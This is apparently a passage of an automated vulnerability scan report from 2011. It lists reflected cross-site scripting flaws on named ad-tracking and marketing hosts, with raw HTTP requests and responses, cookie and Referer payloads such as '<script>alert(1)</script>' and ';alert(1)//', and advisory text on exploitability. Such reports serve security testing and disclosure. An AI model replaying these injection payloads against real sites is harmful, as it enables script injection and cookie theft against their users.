BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:09 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:09 2011&recExp=Mon Mar 7 01:34:09 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:09 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... eady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "U ...[SNIP]...
The value of the ar_p58096422 cookie is copied into the HTML document as plain text between tags. The payload 32276<script>alert(1)</script>892a2bb3012 was submitted in the ar_p58096422 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:07 2011&recExp=Mon Mar 7 01:34:07 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:07 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait% ...[SNIP]...
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c912d<script>alert(1)</script>bd186b7b654 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:11 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:11 2011&recExp=Mon Mar 7 01:34:11 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:11 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... Exp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&c912d<script>alert(1)</script>bd186b7b654' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload aaaa3<script>alert(1)</script>1725631997c was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:13 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:13 2011&recExp=Mon Mar 7 01:34:13 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:13 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 44454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p8 ...[SNIP]...
The value of the hubspotutk cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67955'-alert(1)-'d2c4667455a was submitted in the hubspotutk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /salog.js.aspx HTTP/1.1 Host: bullhorn.app6.hubspot.com Proxy-Connection: keep-alive Referer: http://www.bullhorn.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: .ASPXANONYMOUS=mYIedAj8zAEkAAAANjA0ZDE2ZmItYWRmMi00NWQ0LTk2ZmEtMTZjNDMyYTFlYmM10; hubspotutk=14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a; HUBSPOT39=588321964.0.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Tue, 08 Mar 2011 11:07:54 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 526
var hsUse20Servers = true; var hsDayEndsIn = 64325; var hsWeekEndsIn = 496325; var hsMonthEndsIn = 2051525; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-03-08 06:07:54"; var hsIsNewVisitor = 0; var hsFirstVisitValue = ""; var hsut = '14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a'; var hsVisitLogOff = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed6e'%3balert(1)//c8f3424fcee was submitted in the Referer HTTP header. This input was echoed as 2ed6e';alert(1)//c8f3424fcee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: bullhorn.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=2ed6e'%3balert(1)//c8f3424fcee
Response
HTTP/1.1 301 Moved Permanently Date: Tue, 08 Mar 2011 02:17:24 GMT Server: Apache/2.2.17 (Fedora) X-Powered-By: PHP/5.3.3 Location: http://www.bullhorn.com/ nnCoection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53132
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9345'%3balert(1)//ea0a3ade1f5 was submitted in the Referer HTTP header. This input was echoed as d9345';alert(1)//ea0a3ade1f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /newsrelease-details.php HTTP/1.1 Host: bullhorn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d9345'%3balert(1)//ea0a3ade1f5